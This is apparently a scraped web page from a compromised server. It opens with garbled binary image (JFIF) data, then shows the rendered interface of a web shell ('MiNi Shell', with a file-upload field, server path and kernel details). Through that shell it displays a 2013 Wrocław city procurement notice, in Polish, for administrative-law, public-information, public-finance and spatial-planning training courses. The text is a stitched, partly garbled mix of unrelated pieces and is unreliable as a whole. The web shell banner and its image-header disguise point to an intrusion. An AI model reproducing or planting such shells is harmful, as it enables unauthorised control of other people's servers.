JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130725/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130725/294240-N-2013.html

<p class="kh_header"><b>Wrocław: Szkolenie Kodeks Postępowania Administracyjnego
Szkolenie Dostęp  i ochrona informacji publicznej
Szkolenie Finanse publiczne
Szkolenie Ustawa o planowaniu  i zagospodarowaniu przestrzennym</b><br>
<b>Numer ogłoszenia: 294240 - 2013; data zamieszczenia: 25.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wrocław Urząd Miejski Wrocławia , pl. Nowy Targ 1-8, 50-141 Wrocław, woj. dolnośląskie, tel. 71 7779230, 7779231, faks 71 7779229.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Szkolenie Kodeks Postępowania Administracyjnego
Szkolenie Dostęp  i ochrona informacji publicznej
Szkolenie Finanse publiczne
Szkolenie Ustawa o planowaniu  i zagospodarowaniu przestrzennym.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamawiający zleca Wykonawcy przeprowadzenie szkoleń:
I. Kodeks Postępowania Administracyjnego dla 2 grup po 75 osób - 1 dzień zajęć dla każdej z grup.

II. Dostęp  i ochrona informacji publicznej dla 2 grup po 50 osób - 1 dzień zajęć dla każdej z grup.


III. Finanse publiczne dla 3 grup po 40 osób - 1 dzień zajęć dla każdej z grup.

IV. Ustawa o planowaniu i zagospodarowaniu przestrzennym dla 1 grupy 65 osób - 1 dzień zajęć.

V. Do zadań Wykonawcy należy:

1) Przygotowanie szczegółowego programu szkoleń, który uwzględni:
- aktualne potrzeby dotyczące doskonalenia umiejętności w ww. zakresach,
- ilość czasu przypadającą na poszczególne bloki tematyczne.
Szczegółowy program poszczególnych szkoleń zostanie każdorazowo dookreślony na podstawie konsultacji z przedstawicielami Zamawiającego na etapie przegotowania realizacji szkoleń.
2) Zapewnienie trenera/ów dysponującego/ych doświadczeniem i wiedzą  
w przedmiotowych zakresach.
3) Zapewnienie sali szkoleniowej na terenie miasta Wrocławia, w odległości maksymalnie 5 km od pl. Nowy Targ 1-8 we Wrocławiu, wyposażonej w odpowiedni sprzęt dydaktyczny.
4) Zapewnienie warunków zgodnych z przepisami BHP w trakcie trwania szkolenia. 
5) Zapewnienie materiałów szkoleniowych niezbędnych do prawidłowej realizacji programu szkolenia. 
6) Przygotowanie i przeprowadzenie ankiety ewaluacyjnej na końcu każdego szkolenia i przekazanie Zamawiającemu zbiorczego raportu ewaluacyjnego.
7) Wydanie uczestnikom certyfikatów.
8) Zapewnienie wyżywienia (ciastka, kawa, herbata, woda).
9) Zajęcia szkoleniowe będą się odbywać w dniach od poniedziałku do piątku maksymalnie 8 godzin lekcyjnych dziennie. Dodatkowo Wykonawca zapewni przynajmniej dwie przerwy.
10) Wykonawca wykona usługę w terminie od dnia podpisania umowy do dnia 31.12.2013r.
11) Zamawiający nie jest zobowiązany do zapewnienia wyżywienia bądź noclegów Trenera.

Pozostałe warunki realizacji zamówienia zawarte są w projekcie umowy.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.51.10.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>(osobno dla każdego z zadań 1 - 4):
Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z należytą starannością zrealizował co najmniej jedną usługę realizacji szkolenia zamkniętego o wartości nie mniejszej niż 7500 zł. Przez szkolenie zamknięte Zamawiający rozumie: szkolenie/warsztat organizowany dla grupy pracowników jednej instytucji (urzędu albo innej jednostki organizacyjnej) z indywidualnie ustalonym programem oraz materiałami szkoleniowymi.
Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia (art. 26 ust. 2 b ustawy Pzp).
Ocena spełniania w/w warunków dokonana zostanie w oparciu o informacje zawarte 
w dokumentach i oświadczeniach wyszczególnionych w dziale VIII Specyfikacji Istotnych Warunków Zamówienia. 
Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki wykonawca spełnił</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca;

W zadaniu 1:
- dysponuje osobą/osobami zdolnymi do wykonania zamówienia tj. Wykładowcą posiadającym co najmniej 5 - letnie doświadczenie zawodowe w zakresie Kodeks Postępowania Administracyjnego w tym co najmniej 5-letnie doświadczenie w prowadzeniu szkoleń z tego zakresu; 
- wykładowca wskazany przez Wykonawcę do realizacji usługi wykonywał czynności jako członek Samorządowego Kolegium Odwoławczego;
- posiada publikacje z zakresu Kodeks Postępowania Administracyjnego  (jest autorem/współautorem wydanej książki lub komentarza do ustawy lub napisał i opublikował artykuł prasowy lub jest autorem artykułu opublikowanego w serwisach internetowych poświęconych tematowi Kodeks Postępowania Administracyjnego).

W zadaniu 2:
- dysponuje osobą/osobami zdolnymi do wykonania zamówienia tj. Wykładowcą posiadającym co najmniej 5 - letnie doświadczenie zawodowe w zakresie Dostępu  i ochrony informacji publicznej w tym co najmniej 5-letnie doświadczenie w prowadzeniu szkoleń z tego zakresu; 
- wykładowca wskazany przez Wykonawcę do realizacji usługi będzie posiadać wiedzę z zakresu orzecznictwa w danym obszarze działania; 
- posiada publikacje z zakresu Dostępu  i ochrony informacji publicznej (jest autorem/współautorem wydanej książki lub komentarza do ustawy lub napisał i opublikował artykuł prasowy lub jest autorem artykułu opublikowanego w serwisach internetowych poświęconych  informacji publicznej).

W zadaniu 3:
- dysponuje osobą/osobami zdolnymi do wykonania zamówienia tj. Wykładowcą posiadającym co najmniej 5 - letnie doświadczenie zawodowe w zakresie ustawy Finanse publiczne w tym co najmniej 5-letnie doświadczenie w prowadzeniu szkoleń z tego zakresu; 
- wykładowca wskazany przez Wykonawcę do realizacji usługi będzie posiadać wiedzę z zakresu orzecznictwa w danym obszarze działania; 
- wykładowca wskazany przez Wykonawcę do realizacji usługi wykonywał czynności jako członek Regionalnej Izby Obrachunkowej;
- posiada publikacje z zakresu ustawy Finanse publiczne (jest autorem/współautorem wydanej książki lub komentarza do ustawy lub napisał i opublikował artykuł prasowy lub jest autorem artykułu opublikowanego w serwisach internetowych poświęconych tematowi  ustawy Finanse publiczne). 

W zadaniu 4:
- dysponuje osobą/osobami zdolnymi do wykonania zamówienia tj. Wykładowcą posiadającym co najmniej 5 - letnie doświadczenie zawodowe w zakresie Ustawa o planowaniu  i zagospodarowaniu przestrzennym w tym co najmniej 5-letnie doświadczenie w prowadzeniu szkoleń z tego zakresu; 
- wykładowca wskazany przez Wykonawcę do realizacji usługi będzie posiadać wiedzę z zakresu orzecznictwa w danym obszarze działania; 
- posiada publikacje z zakresu Ustawa o planowaniu  i zagospodarowaniu przestrzennym (jest autorem/współautorem wydanej książki lub komentarza do ustawy lub napisał i opublikował artykuł prasowy lub jest autorem artykułu opublikowanego w serwisach internetowych poświęconych tematowi Ustawa o planowaniu  i zagospodarowaniu przestrzennym).
Ocena spełniania w/w warunków dokonana zostanie w oparciu o informacje zawarte 
w dokumentach i oświadczeniach wyszczególnionych w dziale VIII Specyfikacji Istotnych Warunków Zamówienia. 
Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki wykonawca spełnił</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający informuje, iż przewiduje możliwość zmiany postanowień zawartej umowy       w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy,                      w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej,                    z uwzględnieniem  podawanych warunków ich wprowadzenia:

1)	w przypadku zaistnienia istotnych okoliczności mogących mieć wpływ na termin wykonania usługi, istnieje możliwość, za pisemnym porozumieniem stron, przesunięcia terminu wykonania usługi, 

2)	w innych sytuacjach, których nie można było przewidzieć w chwili zawarcia umowy                   i mających charakter zmian nieistotnych tj. nie odnoszących się do warunków, które gdyby zostały ujęte w ramach pierwotnej procedury udzielania zamówienia, umożliwiłyby dopuszczenie innej oferty niż ta, która została pierwotnie dopuszczona.

Przewidziane powyżej okoliczności stanowiące podstawę zmian do umowy, stanowią uprawnienie Zamawiającego nie zaś jego obowiązek wprowadzenia takich zmian. 

Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Pzp: zmiana danych związanych z obsługą administracyjno-organizacyjną Umowy, zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów między Stronami.

Wszelkie zmiany muszą być dokonywane z zachowaniem przepisu art. 140 ust. 1              i art. 140 ust. 3 ustawy Pzp stanowiącego, że umowa podlega unieważnieniu w części wykraczającej poza określenie przedmiotu zamówienia zawartego w Specyfikacji  Istotnych Warunków Zamówienia.
W przypadku zmian formalno-organizacyjnym, Zamawiający wprowadzi zmianę danych do umowy Aneksem.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.um.wroc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Zamówień Publicznych
Al. M. Kromera 44
51-163 Wrocław
pok. 140.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.08.2013 godzina 10:00, miejsce: Wydział Zamówień Publicznych
Al. M. Kromera 44
51-163 Wrocław
pok. 140.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Szkolenie Kodeks Postępowania Administracyjnego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I. Kodeks Postępowania Administracyjnego dla 2 grup po 75 osób - 1 dzień zajęć dla każdej z grup.

Zakres tematyczny szkolenia:

1.Indywidualna odpowiedzialność funkcjonariusza publicznego, a postępowanie administracyjne - obszary odpowiedzialności majątkowej.
2. Najnowsze zmiany KPA i ich wpływ na tok postępowania.
3.Strony, podmioty na prawach strony i pełnomocnicy w postępowaniu administracyjnym
4. Doręczenia w postępowaniu administracyjnym.
5. Wszczęcie, odmowa i umorzenie postępowania administracyjnego; problematyka art. 63 (m.in. jakim pismom nadać bieg, jak traktować faksy i emaile, co jest dokumentem elektronicznym).
6. Zwrot podania.
7. Dostęp do akt sprawy.
8. Pojęcie terminów (terminy materialne, procesowe, instrukcyjne) i zasady ich obliczania.
9. Postępowanie dowodowe i system środków dowodowych ( ciężar dowodu, rodzaje dowodów, etc.).
10. Zawieszenie postępowania.
11. Współdziałanie administracyjne.
12. Merytoryczne załatwienie sprawy - decyzja załatwiająca sprawę co do istoty.
13. Formalne zakończenie postępowania - umorzenie postępowania w całości i w części.
14.Decyzja administracyjna - elementy, wykonalność, zmiana, wygaśnięcie, przeniesienie, uchylenie. Uzupełnienia, wyjaśnianie i prostowanie treści decyzji.
15. Wznowienie postępowania administracyjnego.
16. Wydawanie zaświadczeń.
17. Problematyka wstrzymania wykonania decyzji administracyjnej.
18. Akty prawa miejscowego jako podstawa decyzji administracyjnej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.10.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Szkolenie Dostęp  i ochrona informacji publicznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> II. Dostęp  i ochrona informacji publicznej dla 2 grup po 50 osób - 1 dzień zajęć dla każdej z grup.

Zakres tematyczny szkolenia:
1. Akty prawne w zakresie dostępu do informacji publicznej.
2. Sposoby i tryby udostępniania informacji publicznej (BIP, udostępnianie informacji na wniosek, etc.).
3. Podstawy odmowy dostępu do informacji publicznej oraz prawne możliwości zaskarżenia decyzji odmownych.
4. Informacja publiczna a ochrona danych osobowych.
5. Informacja publiczna a postępowanie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.10.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Szkolenie Finanse publiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> III. Finanse publiczne dla 3 grup po 40 osób - 1 dzień zajęć dla każdej z grup.

Zakres tematyczny szkolenia:
1. Kompleksowy przegląd zmian - przepisy wprowadzające ustawę o finansach. publicznych, przepisy przejściowe, zmiany wprowadzone ostatnią nowelizacją. Kierunek zmian.
2. Wieloletnia prognoza finansowa jako podstawa planowania wieloletniego w samorządzie terytorialnym.
3. Dochody i przychody jednostek samorządu terytorialnego.
4. Udzielanie dotacji z budżetów jednostek samorządu terytorialnego.
5. Dyscyplina finansów publicznych:
- podmiotowy i przedmiotowy zakres odpowiedzialności za naruszenie dyscypliny finansów publicznych
- zasady odpowiedzialności za naruszenie dyscypliny finansów publicznych 
- zawiadomienie o naruszeniu dyscypliny finansów publicznych 
- prawa i obowiązki obwinionego o naruszenie dyscypliny finansów publicznych
- postępowanie wyjaśniające prowadzone przez rzecznika dyscypliny finansów publicznych, postępowanie przed komisją orzekającą 
- kary za naruszenie dyscypliny finansowej 
- przedawnienie i zatarcie
6. Kontrola oraz nadzór nad gospodarką finansową jednostek samorządu terytorialnego. 7. Zalecenia NIK, RIO i innych organów kontroli dla jednostek administracji publicznej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.10.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Szkolenie Ustawa o planowaniu  i zagospodarowaniu przestrzennym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> IV. Ustawa o planowaniu i zagospodarowaniu przestrzennym dla 1 grupy 65 osób - 1 dzień zajęć.

Zakres tematyczny szkolenia:
1. Najnowsze trendy w orzecznictwie administracyjnym. 
2. Tworzenie planów miejscowych.
3. Techniki zapisu planistycznego pod kątem aktów prawnych, np. ustawy o ochronie zabytków, ochrony przyrody itp.
4. Projektowanie urbanistyczne w kontekście obiektów architektonicznych, ich gabarytów, proporcji, w stosunku do innych funkcji, dobrych praktyk..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.10.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com